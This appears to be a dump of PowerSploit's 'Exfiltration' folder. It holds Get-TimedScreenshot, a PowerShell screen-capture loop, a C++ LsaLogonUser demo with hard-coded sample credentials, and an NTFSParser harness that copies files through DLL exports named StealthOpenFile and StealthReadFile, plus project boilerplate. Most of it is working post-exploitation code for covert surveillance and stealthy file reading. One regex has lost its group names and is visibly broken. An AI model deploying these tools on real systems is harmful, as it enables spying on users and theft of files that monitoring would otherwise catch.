Optional Dependencies: None

.DESCRIPTION

A function that takes screenshots and saves them to a folder.

Each capture is a PNG named from the current date and time (M-D-YYYY-H-m-s.png)
under -Path. The loop runs at least once and then repeats every -Interval seconds
until the current HH:mm string is no longer less than -EndTime.

Defensive note: a steady cadence of timestamp-named PNGs appearing in one folder
is a simple on-disk pattern to look for.

.PARAMETER Path

Specifies the folder path.

.PARAMETER Interval

Specifies the interval in seconds between taking screenshots.

.PARAMETER EndTime

Specifies when the script should stop running in the format HH:mm (compared as a string with Get-Date -Format HH:mm).

.EXAMPLE

PS C:\> Get-TimedScreenshot -Path c:\temp\ -Interval 30 -EndTime 14:00

.LINK

http://obscuresecurity.blogspot.com/2013/01/Get-TimedScreenshot.html
https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-TimedScreenshot.ps1
#>

    [CmdletBinding()] Param(
        [Parameter(Mandatory=$True)]
        [ValidateScript({Test-Path -Path $_ })]
        [String] $Path,

        [Parameter(Mandatory=$True)]
        [Int32] $Interval,

        [Parameter(Mandatory=$True)]
        [String] $EndTime
    )

    #Define helper function that generates and saves screenshot
    # Takes no parameters: it reads $FilePath from the caller's scope, which the
    # loop below sets before each call.
    Function Get-Screenshot {
        $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen   # never read; reassigned in the else branch

        $VideoController = Get-WmiObject -Query 'SELECT VideoModeDescription FROM Win32_VideoController'

        # NOTE(review): the named capture groups in this pattern appear to have lost
        # their <...> names in extraction; the $Matches['ScreenWidth'] and
        # $Matches['ScreenHeight'] lookups below imply those two group names.
        if ($VideoController.VideoModeDescription -and $VideoController.VideoModeDescription -match '(?^\d+) x (?\d+) x .*$') {
            $Width = [Int] $Matches['ScreenWidth']
            $Height = [Int] $Matches['ScreenHeight']
        } else {
            # Fallback when WMI yields no usable mode string: the virtual-screen size.
            $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen

            $Width = $ScreenBounds.Width
            $Height = $ScreenBounds.Height
        }

        $Size = New-Object System.Drawing.Size($Width, $Height)
        $Point = New-Object System.Drawing.Point(0, 0)

        # Capture from the origin into a bitmap of the computed size, save as PNG, release GDI objects.
        $ScreenshotObject = New-Object Drawing.Bitmap $Width, $Height
        $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
        $DrawingGraphics.CopyFromScreen($Point, [Drawing.Point]::Empty, $Size)
        $DrawingGraphics.Dispose()
        $ScreenshotObject.Save($FilePath)
        $ScreenshotObject.Dispose()
    }

    Try {

        #load required assembly
        Add-Type -Assembly System.Windows.Forms

        Do {
            #get the current time and build the filename from it
            $Time = (Get-Date)

            [String] $FileName = "$($Time.Month)"
            $FileName += '-'
            $FileName += "$($Time.Day)"
            $FileName += '-'
            $FileName += "$($Time.Year)"
            $FileName += '-'
            $FileName += "$($Time.Hour)"
            $FileName += '-'
            $FileName += "$($Time.Minute)"
            $FileName += '-'
            $FileName += "$($Time.Second)"
            $FileName += '.png'

            #use join-path to add path to filename
            [String] $FilePath = (Join-Path $Path $FileName)

            #run screenshot function
            Get-Screenshot

            Write-Verbose "Saved screenshot to $FilePath. Sleeping for $Interval seconds"

            Start-Sleep -Seconds $Interval
        }

        #note that this will run once regardless if the specified time as passed
        While ((Get-Date -Format HH:mm) -lt $EndTime)
    }

    # NOTE(review): as written, '+' is passed to Write-Error as a separate positional
    # argument rather than concatenating the two strings; wrapping the whole
    # expression in parentheses would yield the intended single message.
    Catch {Write-Error $Error[0].ToString() + $Error[0].InvocationInfo.PositionMessage}
}
118 |
--------------------------------------------------------------------------------
/Exfiltration/Get-VaultCredential.ps1xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | VaultItemView
6 |
7 | VAULTCLI.VAULTITEM
8 |
9 |
10 |
11 |
12 |
13 |
14 | Vault
15 |
16 |
17 | Resource
18 |
19 |
20 | Identity
21 |
22 |
23 | Credential
24 |
25 |
26 | PackageSid
27 |
28 |
29 | LastModified
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "logon", "logon\logon.vcxproj", "{D248AC1C-B831-42AE-835A-1B98B2BF9DF3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|Win32.Build.0 = Debug|Win32
16 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.ActiveCfg = Debug|x64
17 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Debug|x64.Build.0 = Debug|x64
18 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.ActiveCfg = Release|Win32
19 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|Win32.Build.0 = Release|Win32
20 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.ActiveCfg = Release|x64
21 | {D248AC1C-B831-42AE-835A-1B98B2BF9DF3}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp:
--------------------------------------------------------------------------------
1 | // LogonUser.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
using namespace std;

// Forward declarations. Only CreateNtlmLogonStructure and WriteUnicodeString are
// defined in this file; wcsByteLen and InitUnicodeString have no definition here
// (unused leftovers, or defined elsewhere in the project).
size_t wcsByteLen( const wchar_t* str );
void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset );
PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size);
size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset);
12 |
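// Owns every handle and buffer one logon attempt acquires and releases them in
// the destructor, so each early return in _tmain cleans up.
struct LogonResources
{
    HANDLE hLSA;          // from LsaConnectUntrusted
    PVOID authBuffer;     // from CreateNtlmLogonStructure (allocated with new BYTE[])
    HANDLE procToken;     // from OpenProcessToken
    PVOID profileBuffer;  // from LsaLogonUser
    HANDLE token;         // from LsaLogonUser

    LogonResources()
        : hLSA(NULL), authBuffer(NULL), procToken(NULL), profileBuffer(NULL), token(NULL)
    {
    }

    ~LogonResources()
    {
        if (token != NULL) CloseHandle(token);
        if (profileBuffer != NULL) LsaFreeReturnBuffer(profileBuffer);
        if (procToken != NULL) CloseHandle(procToken);
        delete[] static_cast<BYTE*>(authBuffer); // delete[] on NULL is a no-op
        if (hLSA != NULL) LsaDeregisterLogonProcess(hLSA);
    }
};

// Demo driver: performs an MSV1_0 interactive logon through LsaLogonUser with
// fixed sample credentials and prints which step failed, if any.
//
// Returns 1 on success (kept as in the original; note that 0 is the usual
// success exit code) and -1 on any failure.
int _tmain(int argc, _TCHAR* argv[])
{
    LogonResources res;

    //Get a handle to LSA
    NTSTATUS status = LsaConnectUntrusted(&res.hLSA);
    if (status != 0)
    {
        cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl;
        res.hLSA = NULL; // nothing to deregister
        return -1;
    }
    if (res.hLSA == NULL)
    {
        cout << "hLSA is NULL, this shouldn't ever happen" << endl;
        return -1;
    }

    //Build LsaLogonUser parameters
    LSA_STRING originName = {};
    char originNameStr[] = "qpqp";
    originName.Buffer = originNameStr;
    originName.Length = (USHORT)strlen(originNameStr);
    originName.MaximumLength = originName.Length;

    // Stack-allocated: LsaLookupAuthenticationPackage only reads it.
    ULONG authPackage = 0;
    LSA_STRING authPackageName = {};
    char authPackageBuf[] = MSV1_0_PACKAGE_NAME;
    authPackageName.Buffer = authPackageBuf;
    authPackageName.Length = (USHORT)strlen(authPackageBuf);
    authPackageName.MaximumLength = authPackageName.Length;
    status = LsaLookupAuthenticationPackage(res.hLSA, &authPackageName, &authPackage);
    if (status != 0)
    {
        ULONG winError = LsaNtStatusToWinError(status);
        cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError << endl;
        return -1;
    }

    // Sample values for a demo account, not real secrets. The buffer is heap
    // allocated by CreateNtlmLogonStructure and released by res.
    DWORD authBufferSize = 0;
    res.authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize);
    cout << "authBufferSize: " << authBufferSize << endl;

    //Get TokenSource from our own token. TOKEN_QUERY is all GetTokenInformation needs.
    HANDLE hProcess = GetCurrentProcess(); // pseudo-handle, nothing to close
    BOOL success = OpenProcessToken(hProcess, TOKEN_QUERY, &res.procToken);
    if (!success)
    {
        DWORD errorCode = GetLastError();
        cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl;
        return -1;
    }

    TOKEN_SOURCE tokenSource = {};
    DWORD realSize = 0;
    success = GetTokenInformation(res.procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize);
    if (!success)
    {
        cout << "Call to GetTokenInformation failed." << endl;
        return -1;
    }

    //Outputs of LsaLogonUser
    ULONG profileBufferSize = 0;
    LUID loginId = {};
    QUOTA_LIMITS quotaLimits = {};
    NTSTATUS subStatus = 0;

    status = LsaLogonUser(res.hLSA,
        &originName,
        RemoteInteractive,
        authPackage,
        res.authBuffer,
        authBufferSize,
        0,
        &tokenSource,
        &res.profileBuffer,
        &profileBufferSize,
        &loginId,
        &res.token,
        &quotaLimits,
        &subStatus);

    if (status != 0)
    {
        ULONG winError = LsaNtStatusToWinError(status);
        cout << "Error calling LsaLogonUser. Error code: " << winError << endl;
        return -1;
    }

    cout << "Success!" << endl;

    return 1;
}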
109 |
// Builds an MSV1_0_INTERACTIVE_LOGON whose three UNICODE_STRINGs point into the
// same heap block, directly after the fixed-size header, so the whole thing can
// be handed to LsaLogonUser as one contiguous authentication buffer.
//
// The block is allocated with new BYTE[] and owned by the caller. *size receives
// the total byte length; the embedded strings are not NUL-terminated.
PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size)
{
    const size_t headerBytes = sizeof(MSV1_0_INTERACTIVE_LOGON);
    const size_t stringBytes = (domain.length() + username.length() + password.length()) * sizeof(wchar_t);
    const size_t totalBytes = headerBytes + stringBytes;

    BYTE* block = new BYTE[totalBytes];
    PMSV1_0_INTERACTIVE_LOGON logon = reinterpret_cast<PMSV1_0_INTERACTIVE_LOGON>(block);
    logon->MessageType = MsV1_0InteractiveLogon;

    // Each string is appended right after the previous one; WriteUnicodeString
    // returns the number of bytes it consumed.
    size_t cursor = headerBytes;
    cursor += WriteUnicodeString(domain, &logon->LogonDomainName, logon, cursor);
    cursor += WriteUnicodeString(username, &logon->UserName, logon, cursor);
    cursor += WriteUnicodeString(password, &logon->Password, logon, cursor);

    *size = (DWORD)totalBytes; // a total beyond a DWORD would indicate a gross upstream bug
    return logon;
}
127 |
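// Copies str's characters into the caller's block at baseAddress + offset and
// points uniStr at them. Length and MaximumLength are byte counts (UNICODE_STRING
// convention, no terminator). Returns the number of bytes written so the caller
// can advance its offset.
//
// UNICODE_STRING lengths are USHORT, so a string of 32K+ characters would be
// described with a truncated length; the three inputs used here are far below that.
size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset)
{
    const size_t byteCount = str.length() * sizeof(wchar_t);
    PWSTR dest = (PWSTR)((UINT_PTR)baseAddress + offset); // computed once, used for both the copy and the pointer

    uniStr->Length = (USHORT)byteCount;
    uniStr->MaximumLength = (USHORT)byteCount;
    uniStr->Buffer = dest;
    memcpy(dest, str.c_str(), byteCount);
    return byteCount;
}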
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Debug
10 | x64
11 |
12 |
13 | Release
14 | Win32
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F9DC2AAF-2213-4D87-9F52-283DA1CC6E18}
23 | Win32Proj
24 | LogonUser
25 |
26 |
27 |
28 | Application
29 | true
30 | v110
31 | Unicode
32 |
33 |
34 | Application
35 | true
36 | v110
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v110
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | false
49 | v110
50 | true
51 | Unicode
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 | true
71 |
72 |
73 | true
74 |
75 |
76 | false
77 |
78 |
79 | false
80 |
81 |
82 |
83 | Use
84 | Level3
85 | Disabled
86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
87 |
88 |
89 | Console
90 | true
91 | secur32.lib;%(AdditionalDependencies)
92 |
93 |
94 |
95 |
96 | Use
97 | Level3
98 | Disabled
99 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
100 |
101 |
102 | Console
103 | true
104 | secur32.lib;%(AdditionalDependencies)
105 |
106 |
107 |
108 |
109 | Level3
110 | Use
111 | MaxSpeed
112 | true
113 | true
114 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
115 |
116 |
117 | Console
118 | true
119 | true
120 | true
121 |
122 |
123 |
124 |
125 | Level3
126 | Use
127 | MaxSpeed
128 | true
129 | true
130 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
131 |
132 |
133 | Console
134 | true
135 | true
136 | true
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 | Create
150 | Create
151 | Create
152 | Create
153 |
154 |
155 |
156 |
157 |
158 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : LogonUser Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this LogonUser application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your LogonUser application.
9 |
10 |
11 | LogonUser.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | LogonUser.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | LogonUser.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 |
16 |
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : logon Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this logon DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your logon application.
9 |
10 |
11 | logon.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | logon.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | logon.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named logon.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point for the logon module.
//
// No work is performed on any loader notification: process attach/detach and
// thread attach/detach all take the same path and simply report success, so
// the loader keeps the module mapped. The parameters are deliberately unused.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;
    (void)ul_reason_for_call;   // DLL_PROCESS_ATTACH/DETACH, DLL_THREAD_ATTACH/DETACH: all no-ops
    (void)lpReserved;
    return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 | #include
22 |
23 |
24 |
25 | // TODO: reference additional headers your program requires here
26 |
--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | {5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
1 | /*
2 | * NTFS include files
3 | *
4 | * Copyright(C) 2010 cyb70289
5 | *
6 | * This program/include file is free software; you can redistribute it and/or
7 | * modify it under the terms of the GNU General Public License as published
8 | * by the Free Software Foundation; either version 2 of the License, or
9 | * (at your option) any later version.
10 | *
11 | * This program/include file is distributed in the hope that it will be
12 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | * GNU General Public License for more details.
15 | */
16 |
17 | #ifndef __NTFS_H_CYB70289
18 | #define __NTFS_H_CYB70289
19 |
20 | #pragma pack(8)
21 |
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 |
26 | #pragma pack()
27 |
28 | #endif
29 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | *
3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
4 | *
5 | * This program/include file is free software; you can redistribute it and/or
6 | * modify it under the terms of the GNU General Public License as published
7 | * by the Free Software Foundation; either version 2 of the License, or
8 | * (at your option) any later version.
9 | *
10 | * This program/include file is distributed in the hope that it will be
11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | * GNU General Public License for more details.
14 | */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289
17 |
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 |
25 | using namespace std;
26 |
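// Function-pointer types matching the exports in NTFSParserDLL.cpp:
//   HANDLE StealthOpenFile (char* path);
//   DWORD  StealthReadFile (FileInfo_t* file, BYTE* buf, DWORD bufSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* remaining);
//   void   StealthCloseFile(FileInfo_t* file);
// The DLL's FileInfo_t* is treated here as the opaque HANDLE that StealthOpenFile
// returns; both are plain pointers, so the call is ABI-compatible.
// (The previous typedef passed a std::string as the first argument, which does
// not match what the DLL exports.)
typedef HANDLE (CDECL *StealthOpenFile_Func)(char*);
typedef DWORD  (CDECL *StealthReadFile_Func)(HANDLE, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
typedef void   (CDECL *StealthCloseFile_Func)(HANDLE);

// Test harness for NTFSParserDLL: copies c:\test\test.txt to c:\test\test2.txt
// through the raw-NTFS reader, 1 MiB at a time, and prints the last return code.
//
// Exit codes: 0 copied; 1 DLL or one of its exports could not be resolved;
// 2 StealthOpenFile failed; 3 StealthReadFile returned an error (a partial
// test2.txt may remain on disk in that case).
int _tmain(int argc, _TCHAR* argv[])
{
	// NOTE(review): a bare module name is resolved through the normal DLL search
	// order, so a same-named DLL found earlier on that path would be loaded and
	// executed instead. For anything beyond a local test, load by full path.
	HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
	if (parserDLLHandle == NULL)
	{
		cout << "LoadLibraryA(NTFSParserDLL.dll) failed" << endl;
		return 1;
	}

	// Resolve all three exports up front; a NULL here previously went unnoticed
	// and was called straight away.
	StealthOpenFile_Func  StealthOpenFile  = (StealthOpenFile_Func) GetProcAddress(parserDLLHandle, "StealthOpenFile");
	StealthReadFile_Func  StealthReadFile  = (StealthReadFile_Func) GetProcAddress(parserDLLHandle, "StealthReadFile");
	StealthCloseFile_Func StealthCloseFile = (StealthCloseFile_Func)GetProcAddress(parserDLLHandle, "StealthCloseFile");
	if (StealthOpenFile == NULL || StealthReadFile == NULL || StealthCloseFile == NULL)
	{
		cout << "GetProcAddress failed for one of the Stealth* exports" << endl;
		return 1;
	}

	// StealthOpenFile takes a non-const char*; use a writable array rather than
	// a string literal.
	char sourcePath[] = "c:\\test\\test.txt";
	HANDLE file = StealthOpenFile(sourcePath);
	if (file == NULL)
	{
		cout << "StealthOpenFile failed" << endl;
		return 2;
	}

	const DWORD buffSize = 1024*1024;
	BYTE* buffer = new BYTE[buffSize];

	ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);

	// Read in buffSize chunks until the DLL reports nothing remaining. The
	// original copied only the first chunk and ignored bytesLeft.
	ULONGLONG offset = 0;
	DWORD ret = 0;
	for (;;)
	{
		DWORD bytesRead = 0;
		ULONGLONG bytesLeft = 0;
		ret = StealthReadFile(file, buffer, buffSize, offset, &bytesRead, &bytesLeft);
		if (ret != 0)
		{
			break;   // do not write a buffer the DLL did not fill
		}
		myFile.write((char*)buffer, bytesRead);
		offset += bytesRead;
		if (bytesLeft == 0 || bytesRead == 0)
		{
			break;   // whole file copied (bytesRead == 0 guards against spinning)
		}
	}

	cout << "Return value: " << ret << endl;

	StealthCloseFile(file);
	delete[] buffer;

	return (ret == 0) ? 0 : 3;
}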
49 |
50 |
--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
